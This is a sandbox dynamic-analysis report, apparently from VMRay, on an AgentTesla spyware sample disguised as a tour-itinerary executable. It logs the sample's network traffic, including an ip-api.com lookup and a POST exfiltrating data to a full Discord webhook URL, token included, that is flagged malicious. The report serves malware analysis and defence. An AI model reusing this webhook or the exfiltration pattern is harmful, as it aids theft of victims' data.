AgentTesla | ac71f9ab4ccb

Classifications

Spyware Injector

Threat Names

Mal/Generic-S AgentTesla AgentTesla.v4

Dynamic Analysis Report

Created 1 year ago

Draft Itinerary 2024 tour plan - A Best Outbound client.exe

Windows Exe (x86-32)

Remarks (1/1)

Process Crash (0x02000008): One or more processes crashed during the analysis. Analysis results may be incomplete.

General

2.67 KB total sent, 5.28 KB total received

3 ports: 80, 443, 53

3 contacted IP addresses

0 URLs extracted

3 files downloaded

1 malicious hosts detected

DNS

113 Bytes sent, 209 Bytes received

2 queries for 2 domains

1 name server contacted

0 queries returned errors

HTTP/S

2.56 KB sent, 5.08 KB received

2 URLs, 2 contacted servers

2 sessions detected

2 Hosts

Requests

Severity

discord.com443

ip-api.com80

HTTP Requests (1)DNS Requests (1)WHOIS

Method	URL	Response	Dest. IP	Dest. Port		Verdict

POST

https://discord.com/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f

404

162.159.128.233

443

Malicious

RequestResponseFunction Log (26)PCAP Stream (3)

General Information

Timestamp	165.009000
URL	https://discord.com/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f
Original URL	https://discord.com/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f
Version	1.1
Method	POST

Request Headers

Content-Type	multipart/form-data; boundary="----------794a7b62a967425eb20c93944cf21ed2"
User-Agent	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host	discord.com
Content-Length	1173
Expect	100-continue
Connection	Keep-Alive

URL Reputation Information

Reputation Status	N/A
Threat Data	-
First Seen	-
Last Seen	-
Categories	entertainment, social_networking

File Reputation InformationFilename: N/A
Reputation Status: N/A
First Seen:-
Last Seen:-
Names:-
Families:-
Classifications: -

Function Logfile

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\".

Before

After

WHOIS Domain Information

Screenshot

Filename:	N/A
Reputation Status:	N/A
First Seen:	-
Last Seen:	-
Names:	-
Families:	-
Classifications:	-